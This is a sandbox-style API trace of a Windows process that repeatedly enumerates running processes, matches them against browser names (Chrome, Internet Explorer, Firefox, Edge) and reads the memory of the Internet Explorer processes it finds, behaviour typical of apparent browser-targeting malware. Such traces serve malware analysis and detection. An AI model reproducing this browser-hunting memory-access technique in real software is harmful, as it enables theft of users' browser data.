	[0251.751] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0251.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa388
	[0251.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.753] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0251.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.753] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.754] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0251.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.754] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0251.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa38c
	[0251.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.756] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0251.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.756] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.757] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0251.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.758] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.758] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0251.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa390
	[0251.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.759] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0251.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.760] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.760] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0251.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.761] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.761] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa394
	[0251.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.762] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0251.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.763] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0251.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.763] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0251.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.763] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.764] NtQueryInformationProcess (in: ProcessHandle=0xa394, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0251.764] ReadProcessMemory (in: hProcess=0xa394, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0251.764] ReadProcessMemory (in: hProcess=0xa394, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0251.764] ReadProcessMemory (in: hProcess=0xa394, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0251.764] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0251.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa398
	[0251.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.765] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0251.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.766] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0251.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.766] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0251.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.766] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.766] NtQueryInformationProcess (in: ProcessHandle=0xa398, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0251.766] ReadProcessMemory (in: hProcess=0xa398, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0251.767] ReadProcessMemory (in: hProcess=0xa398, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0251.767] ReadProcessMemory (in: hProcess=0xa398, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0251.767] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0251.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa39c
	[0251.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.768] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0251.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.768] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.768] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0251.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.769] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.769] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0251.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa3a0
	[0251.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.770] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0251.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.771] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.771] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0251.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.772] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa3a4
	[0251.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.773] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.774] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.774] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.774] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa3a8
	[0251.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.777] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.777] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.778] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.778] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa3ac
	[0251.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.780] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.780] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.781] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.781] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa3b0
	[0251.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.783] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0251.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.783] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.784] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0251.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.784] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa3b4
	[0251.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.786] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.787] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.787] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.788] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.789] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa3b8
	[0251.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.790] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.790] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.791] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.791] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.791] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa3bc
	[0251.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.793] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0251.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.793] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.793] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0251.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.794] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa3c0
	[0251.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.795] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.796] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.796] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.797] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.797] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa3c4
	[0251.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.798] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0251.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.798] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.799] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0251.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.799] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa3c8
	[0251.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.801] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.802] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.802] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa3cc
	[0251.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.803] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0251.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.804] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.804] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0251.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.804] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.804] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa3d0
	[0251.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.805] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.806] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.806] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.806] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa3d4
	[0251.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.808] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0251.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.808] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.808] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0251.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.808] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.809] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0251.809] CloseHandle (hObject=0x4fd0) returned 1
	[0251.809] Sleep (dwMilliseconds=0x64) 
	[0251.910] GetCurrentProcessId () returned 0x110
	[0251.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0251.913] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0251.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0251.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0251.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa3d8
	[0251.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.916] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.916] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.917] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.917] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.917] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa3dc
